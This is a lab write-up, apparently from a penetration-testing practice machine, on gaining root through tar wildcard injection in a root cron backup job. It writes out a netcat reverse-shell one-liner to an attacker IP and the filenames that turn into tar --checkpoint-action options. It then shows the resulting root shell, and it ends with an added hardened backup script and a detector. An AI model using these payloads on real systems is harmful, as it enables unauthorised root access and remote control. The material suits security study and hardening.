Wildcard with tar

The Bash script that the root cron job executes every third minute is a backup script that uses tar to archive the web root directory, /var/www/html. The issue is the unquoted wildcard at the end of the tar command: the shell expands it into whatever filenames exist in that directory before tar ever sees them.

According to GTFOBins, the flags --checkpoint=1 --checkpoint-action=exec=/bin/sh can be appended to tar to get code execution.

An online resource also documents the tar wildcard injection technique.

pe.sh


alice@readys:/var/www/html$ echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|bash -i 2>&1|nc 192.168.45.218 1234 >/tmp/f' > /var/www/html/pe.sh ; chmod 755 /var/www/html/pe.sh

First, I will create a Bash reverse shell script in the web root directory and make it executable.

flag files


alice@readys:/var/www/html$ echo "" > '--checkpoint=1'
alice@readys:/var/www/html$ echo "" > '--checkpoint-action=exec=sh pe.sh'

Then I will create two files: --checkpoint=1 and --checkpoint-action=exec=sh pe.sh.

Execution Flow


The flag files as well as the reverse shell script are now in place in the web root directory, /var/www/html.

tar -cf /opt/backups/website.tar * --checkpoint=1 --checkpoint-action=exec=sh pe.sh

This is how the tar command in /usr/local/bin/backup.sh reads once the shell has expanded the wildcard: the two filenames are passed to tar as options, and the checkpoint action runs sh pe.sh with the privileges of the cron job, i.e. as root.

Shell


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/readys]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [192.168.45.218] from (UNKNOWN) [192.168.154.166] 52966
bash: cannot set terminal process group (14384): Inappropriate ioctl for device
bash: no job control in this shell
root@readys:/var/www/html# whoami
whoami
root
root@readys:/var/www/html# hostname
hostname
readys
root@readys:/var/www/html# ifconfig
ifconfig
ens192: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
        inet 192.168.154.166  netmask 255.255.255.0  broadcast 192.168.154.255
        inet6 fe80::250:56ff:fe9e:6966  prefixlen 64  scopeid 0x20<link>
        ether 00:50:56:9e:69:66  txqueuelen 1000  (Ethernet)
        RX packets 72550  bytes 6073447 (5.7 MiB)
        RX errors 0  dropped 504  overruns 0  frame 0
        TX packets 57875  bytes 7961071 (7.5 MiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0
 
lo: flags=73<UP,LOOPBACK,RUNNING>  mtu 65536
        inet 127.0.0.1  netmask 255.0.0.0
        inet6 ::1  prefixlen 128  scopeid 0x10<host>
        loop  txqueuelen 1000  (Local Loopback)
        RX packets 45  bytes 4582 (4.4 KiB)
        RX errors 0  dropped 0  overruns 0  frame 0
        TX packets 45  bytes 4582 (4.4 KiB)
        TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

System level compromise
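As an added defender-side example (not part of the original writeup), the same backup job rewritten so that no filename can turn into a tar option, together with a check that lists filenames a glob would hand to tar as flags. The directory and archive paths are constructed for the demo; the real job would point the source at /var/www/html.

```sh
#!/bin/sh
# Added example, not from the original writeup: a backup job written so that a
# filename such as '--checkpoint=1' in the web root cannot become a tar option,
# plus a check that lists such filenames. Directory paths are constructed for
# the demo; the real job would use /var/www/html as the source.

# Print every entry in "$1" whose name starts with '-'. Such names are exactly
# what an unquoted glob like 'tar -cf out.tar *' would hand to tar as options.
# Returns 0 when at least one such entry exists, 1 otherwise.
find_option_like_names() {
    dir=$1
    found=1
    for f in "$dir"/* "$dir"/.[!.]* "$dir"/..?*; do
        [ -e "$f" ] || continue        # unmatched glob stays literal; skip it
        case ${f##*/} in
            -*) printf 'suspicious entry: %s\n' "$f"; found=0 ;;
        esac
    done
    return $found
}

# Hardened backup: no glob at all. tar changes into the source directory and
# archives '.', so member names come from the filesystem, never from the
# shell's word expansion, and '--' ends option parsing before the operand.
safe_backup() {
    src=$1
    out=$2
    tar -cf "$out" -C "$src" -- .
}

# Demo on a constructed directory that mimics the writeup's web root.
demo_dir=$(mktemp -d)
echo '<html></html>' > "$demo_dir/index.html"
echo '' > "$demo_dir/--checkpoint=1"
echo '' > "$demo_dir/--checkpoint-action=exec=sh pe.sh"
if find_option_like_names "$demo_dir"; then
    echo "option-like filenames present; an unquoted glob here would be unsafe"
fi
safe_backup "$demo_dir" "$demo_dir.tar"   # stores the three files as data, runs nothing
tar -tf "$demo_dir.tar"                   # the odd names appear only as archive members
rm -rf "$demo_dir" "$demo_dir.tar"
```

Running the check from the same cron job and alerting on a hit gives an early signal that someone is staging files in the web root.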